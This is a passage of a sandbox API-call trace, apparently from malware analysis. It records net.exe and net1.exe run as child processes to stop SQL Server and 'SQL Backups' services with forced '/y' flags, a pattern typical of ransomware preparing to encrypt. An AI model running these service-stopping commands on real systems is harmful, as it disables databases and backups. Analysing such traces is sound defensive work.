lpBuffer="堘,⡋瓢&㼨,&") returned 0xc1 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET LOCALGROUP\r", _MaxCount=0xf) returned 7 [0214.694] LocalFree (hMem=0x2c5818) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x16 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET PAUSE\r\nserv", _MaxCount=0xf) returned 3 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x33 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET SESSION\r\n[\\", _MaxCount=0xf) returned 15 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x234 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET SHARE\r\nshar", _MaxCount=0xf) returned 12 [0214.694] LocalFree (hMem=0x2c5818) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x13 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START BROWS", _MaxCount=0xf) returned 14 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START CLIPB", _MaxCount=0xf) returned 14 [0214.694] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.694] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.694] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START EVENT", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START MESSE", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START NET L", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x16 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START RPCLO", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x11 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START RPCSS", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START SCHED", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x12 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START SERVE", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0xf [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START UPS\r\n", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x17 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START WORKS", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x18 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET START\r\n[ser", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x2a [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET STATISTICS\r", _MaxCount=0xf) returned 14 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET STOP\r\nservi", _MaxCount=0xf) returned 19 [0214.695] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x58 [0214.695] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET TIME\r\n\r\n[\\\\", _MaxCount=0xf) returned -1 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x184 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET USE\r\n[devic", _MaxCount=0xf) returned -2 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xc7 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET USER\r\n[user", _MaxCount=0xf) returned -2 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x47 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET VIEW\r\n[\\\\co", _MaxCount=0xf) returned -3 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xc2 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NET\r\n [ ACCO", _MaxCount=0xf) returned 19 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x319 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="SERVICES\r\nNET S", _MaxCount=0xf) returned -5 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x483 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="SYNTAX\r\nThe fol", _MaxCount=0xf) returned -5 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xa86 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="NAMES\r\nThe foll", _MaxCount=0xf) returned 4 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0x54 [0214.696] _wcsnicmp (_String1="NET stop ΓÇ£SQL", _String2="\r\nFor more info", _MaxCount=0xf) returned 97 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&堘,&") returned 0xad [0214.696] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x2e [0214.696] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0214.696] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.696] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x7d [0214.696] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0214.696] LocalFree (hMem=0x2c5818) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x26 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x19 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x1b [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0xbe [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0214.697] LocalFree (hMem=0x2c5818) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x33 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x19 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0xc1 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0214.697] LocalFree (hMem=0x2c5818) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x16 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x33 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="堘,⡋瓢&㼨,&") returned 0x234 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0214.697] LocalFree (hMem=0x2c5818) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&堘,&") returned 0x13 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.697] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.697] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x16 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x11 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x14 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x12 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0xf [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x17 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x18 [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x2a [0214.698] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0214.698] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x26f2a0, nSize=0x0, Arguments=0x26f29c | out: lpBuffer="㼨,⡋瓢&㼨,&") returned 0x15 [0214.699] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0214.699] GetFileType (hFile=0x26c) returned 0x3 [0214.699] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x26f2b8 | out: lpMode=0x26f2b8) returned 0 [0214.699] GetConsoleOutputCP () returned 0x1b5 [0214.699] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0214.699] malloc (_Size=0x16) returned 0x472700 [0214.699] GetConsoleOutputCP () returned 0x1b5 [0214.699] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x472700, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0214.699] WriteFile (in: hFile=0x26c, lpBuffer=0x472700, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x26f2bc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f2bc, lpOverlapped=0x0) returned 0 [0214.699] free (_Block=0x472700) [0214.699] LocalFree (hMem=0x2c3f28) returned 0x0 [0214.700] NetApiBufferFree (Buffer=0x2c1c78) returned 0x0 [0214.700] NetApiBufferFree (Buffer=0x2c1c90) returned 0x0 [0214.700] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£SQL BackupsΓÇ¥ /y" [0214.700] exit (_Code=1) Process: id = "334" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x53507000" os_pid = "0x5cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 507 os_tid = 0xbb4 Process: id = "335" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5c89d000" os_pid = "0xbc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "334" os_parent_pid = "0x5cc" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 508 os_tid = 0x60c [0214.851] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfd30 | out: lpSystemTimeAsFileTime=0xdfd30*(dwLowDateTime=0x4940a2a0, dwHighDateTime=0x1d57a87)) [0214.851] GetCurrentProcessId () returned 0xbc8 [0214.851] GetCurrentThreadId () returned 0x60c [0214.851] GetTickCount () returned 0x116f45e [0214.851] QueryPerformanceCounter (in: lpPerformanceCount=0xdfd28 | out: lpPerformanceCount=0xdfd28*=33513600394) returned 1 [0214.852] GetModuleHandleA (lpModuleName=0x0) returned 0x340000 [0214.852] __set_app_type (_Type=0x1) [0214.852] __p__fmode () returned 0x74eb31f4 [0214.852] __p__commode () returned 0x74eb31fc [0214.852] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x34ffe6) returned 0x0 [0214.852] __getmainargs (in: _Argc=0x359064, _Argv=0x35906c, _Env=0x359068, _DoWildCard=0, _StartInfo=0x359024 | out: _Argc=0x359064, _Argv=0x35906c, _Env=0x359068) returned 0 [0214.852] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.852] GetConsoleOutputCP () returned 0x1b5 [0214.852] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x359080 | out: lpCPInfo=0x359080) returned 1 [0214.852] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.855] sprintf_s (in: _DstBuf=0xdfce8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0214.856] setlocale (category=0, locale=".437") returned="English_United States.437" [0214.858] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0214.858] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0214.858] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" [0214.858] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdfab4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0214.858] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x66) returned 0x743c00 [0214.858] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0214.858] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfcb8 | out: Buffer=0xdfcb8*=0x741c60) returned 0x0 [0214.858] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfcb8 | out: Buffer=0xdfcb8*=0x741c78) returned 0x0 [0214.858] _fileno (_File=0x74eb2900) returned -2 [0214.858] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0214.858] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0214.858] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0214.858] _wcsicmp (_String1="config", _String2="stop") returned -16 [0214.859] 